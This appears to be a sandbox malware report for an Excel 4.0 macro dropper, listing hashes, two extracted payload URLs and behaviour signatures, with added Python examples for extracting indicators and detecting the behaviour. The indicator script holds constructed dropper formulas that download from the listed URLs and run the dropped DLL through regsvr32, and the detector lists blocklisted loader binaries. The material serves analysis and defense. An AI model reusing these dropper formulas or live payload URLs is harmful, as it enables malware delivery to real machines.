General

  • Target

    9fb9f5ccc0af9acbc28bef2fe4bdcf29

  • Size

    36KB

  • Sample

    240216-hqh65acd8z

  • MD5

    9fb9f5ccc0af9acbc28bef2fe4bdcf29

  • SHA1

    aaed45346180ebfd2cf81cf00e86f4eebb58a27c

  • SHA256

    bdf5294285e2792cf563b246673ab836bcf9cf8a9b3065cc45711111decd17a5

  • SHA512

    dbad4076cbe5806952422a787b6962bc2e75b5a6c8b1746ade18b5f9e4c749c72c0e6849542ff87bf1864b2de0b0f76fa38a2720267d4e431b00e92fa1b18018

  • SSDEEP

    768:VPqNk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJemYcwNjCn3T69vrM:dok3hbdlylKsgqopeJBWhZFGkE+cL2NW

Score
10/10

Malware Config

Extracted

Language: xlm4.0

Source          URLs
xlm40.dropper   https://statedauto.com/wp-data.php
xlm40.dropper   https://markens.online/wp-data.php

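The extracted config identifies the sample as an Excel 4.0 (XLM) macro dropper that fetches its payload from the two wp-data.php URLs above. XLM droppers normally hide such URLs by splitting strings and building characters with CHAR(), so pulling indicators out of the sheet means resolving that first. The script below is an added example, not the macro from this sample: its formula cells are constructed to resemble a typical XLM 4.0 dropper (CALL into urlmon!URLDownloadToFileA, then EXEC of the dropped file), and only the two URLs are taken from the report.

```python
"""Pull network indicators out of Excel 4.0 (XLM) macro formulas.

Added example, not the macro from the sample on this page: the formula cells
below are constructed to resemble a typical XLM 4.0 dropper, with the string
splitting and CHAR() obfuscation such macros commonly use. Only the two
wp-data.php URLs are taken from the report's extracted config.
"""
import re
from urllib.parse import urlsplit

# URLs listed in the report's extracted config.
KNOWN_DROPPER_URLS = {
    "https://statedauto.com/wp-data.php",
    "https://markens.online/wp-data.php",
}

# Constructed sheet cells (assumption: representative, not the sample's real macro).
SAMPLE_CELLS = {
    "A1": '=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,'
          '"https://statedauto.com/wp-data.php","C:\\Users\\Public\\x1.dll",0,0)',
    "A2": '=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,'
          '"https://"&"markens.online"&CHAR(47)&"wp-data.php","C:\\Users\\Public\\x2.dll",0,0)',
    "A3": '=EXEC("regsvr32 -s C:\\Users\\Public\\x1.dll")',
    "A4": "=HALT()",
}

CHAR_RE = re.compile(r"CHAR\((\d+)\)", re.IGNORECASE)
CONCAT_RE = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')
URL_RE = re.compile(r"https?://[^\s\"'(),]+")
DROP_RE = re.compile(r'"([A-Za-z]:\\[^"]*)"')
EXEC_RE = re.compile(r'=EXEC\("([^"]*)"', re.IGNORECASE)


def deobfuscate(formula):
    """Resolve CHAR(n) to a quoted character, then fold "a"&"b" into "ab" until stable."""
    formula = CHAR_RE.sub(lambda m: '"' + chr(int(m.group(1))) + '"', formula)
    previous = None
    while previous != formula:
        previous = formula
        formula = CONCAT_RE.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', formula)
    return formula


def extract_iocs(cells):
    """Return URLs, drop paths and EXEC command lines found across all cells, in cell order."""
    urls, drop_paths, commands = [], [], []
    for formula in cells.values():
        clean = deobfuscate(formula)
        urls.extend(URL_RE.findall(clean))
        drop_paths.extend(DROP_RE.findall(clean))
        commands.extend(EXEC_RE.findall(clean))
    return {"urls": urls, "drop_paths": drop_paths, "commands": commands}


def classify_urls(urls):
    """Split each URL into host/path and flag whether it matches the extracted config."""
    result = []
    for url in dict.fromkeys(urls):  # de-duplicate, keep first-seen order
        parts = urlsplit(url)
        result.append({
            "url": url,
            "host": parts.hostname,
            "path": parts.path,
            "in_extracted_config": url in KNOWN_DROPPER_URLS,
        })
    return result


if __name__ == "__main__":
    iocs = extract_iocs(SAMPLE_CELLS)
    for entry in classify_urls(iocs["urls"]):
        print(entry)
    print("drop paths:", iocs["drop_paths"])
    print("commands:", iocs["commands"])
```

The CHAR()/concatenation folding is deliberately simple: it handles the literal-only obfuscation seen in many XLM droppers but not macros that compute strings from cell references or FORMULA() writes, which need a real XLM emulator rather than regex passes.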
Targets

    • Target

      9fb9f5ccc0af9acbc28bef2fe4bdcf29

    • Size

      36KB

    • MD5

      9fb9f5ccc0af9acbc28bef2fe4bdcf29

    • SHA1

      aaed45346180ebfd2cf81cf00e86f4eebb58a27c

    • SHA256

      bdf5294285e2792cf563b246673ab836bcf9cf8a9b3065cc45711111decd17a5

    • SHA512

      dbad4076cbe5806952422a787b6962bc2e75b5a6c8b1746ade18b5f9e4c749c72c0e6849542ff87bf1864b2de0b0f76fa38a2720267d4e431b00e92fa1b18018

    • SSDEEP

      768:VPqNk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJemYcwNjCn3T69vrM:dok3hbdlylKsgqopeJBWhZFGkE+cL2NW

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

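The two signatures above are parent/child and process-attribution checks over endpoint telemetry. The script below is an added example, not Triage's own signature logic: it walks a constructed event stream shaped like an Excel 4.0 macro dropper (Excel launching a loader binary that then talks to the network) and raises both alerts. The Office, expected-child and blocklisted process sets are this example's own assumptions and would be tuned per environment.

```python
"""Two process-telemetry detections matching the signatures the sandbox raised.

Added example, not Triage's own signature logic. The event stream is
constructed to mimic an Excel 4.0 macro dropper; the Office, expected-child
and blocklisted process sets are this example's own assumptions.
"""
import ntpath

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# Children an Office application legitimately spawns (assumption: tune for the fleet).
EXPECTED_CHILDREN = {"splwow64.exe", "dw20.exe"}
# Living-off-the-land binaries treated as blocklisted for outbound network use (assumption).
BLOCKLISTED = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe"}

# Constructed telemetry: process creations and network connections, in time order.
EVENTS = [
    {"type": "process_create", "pid": 3020, "ppid": 800,
     "image": r"C:\Windows\explorer.exe"},
    {"type": "process_create", "pid": 4100, "ppid": 3020,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"},
    {"type": "process_create", "pid": 4200, "ppid": 4100,
     "image": r"C:\Windows\splwow64.exe"},
    {"type": "process_create", "pid": 4188, "ppid": 4100,
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 -s C:\Users\Public\x1.dll"},
    {"type": "network_connect", "pid": 4188, "dest": "statedauto.com:443"},
    {"type": "network_connect", "pid": 4100, "dest": "statedauto.com:443"},
]


def basename(image):
    """Lower-cased file name of a Windows image path."""
    return ntpath.basename(image).lower()


def detect(events):
    """Walk events in order, tracking pid -> image so later events can be attributed."""
    images = {}
    alerts = []
    for ev in events:
        if ev["type"] == "process_create":
            images[ev["pid"]] = ev["image"]
            parent = images.get(ev["ppid"])
            child = basename(ev["image"])
            # Signature 1: an Office parent spawning something outside its normal child set.
            if parent and basename(parent) in OFFICE_PARENTS and child not in EXPECTED_CHILDREN:
                alerts.append({
                    "signature": "Process spawned unexpected child process",
                    "parent": basename(parent), "child": child,
                    "pid": ev["pid"], "cmdline": ev.get("cmdline", ""),
                })
        elif ev["type"] == "network_connect":
            image = images.get(ev["pid"])
            # Signature 2: a blocklisted binary is the source of an outbound connection.
            if image and basename(image) in BLOCKLISTED:
                alerts.append({
                    "signature": "Blocklisted process makes network request",
                    "process": basename(image), "pid": ev["pid"], "dest": ev["dest"],
                })
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Note that the Excel process itself making the wp-data.php request is not flagged by the second rule; catching that stage needs a separate rule keyed on Office processes reaching non-Microsoft hosts, which this example leaves out.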
MITRE ATT&CK Enterprise v15

Tasks